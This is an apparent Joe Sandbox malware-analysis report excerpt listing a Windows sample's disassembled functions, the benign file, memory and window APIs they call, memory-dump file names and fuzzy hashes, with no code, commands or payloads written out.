                                                                                                                                                  • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                  Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                  Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                  Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                  • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                  • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                  • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                  Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                  • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                  • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                  • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                  Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                  • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                  • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                  • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                  Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                  • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                  • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                  • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                  Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3394109436-0
                                                                                                                                                  • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                  • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                  • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                  • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                  Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                  • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                  • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                  • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                  Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                  • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                  • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                  • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                  • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                  Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                  • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                  • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                  • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                  Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                  • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                  • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                  • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                  Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4115351271-0
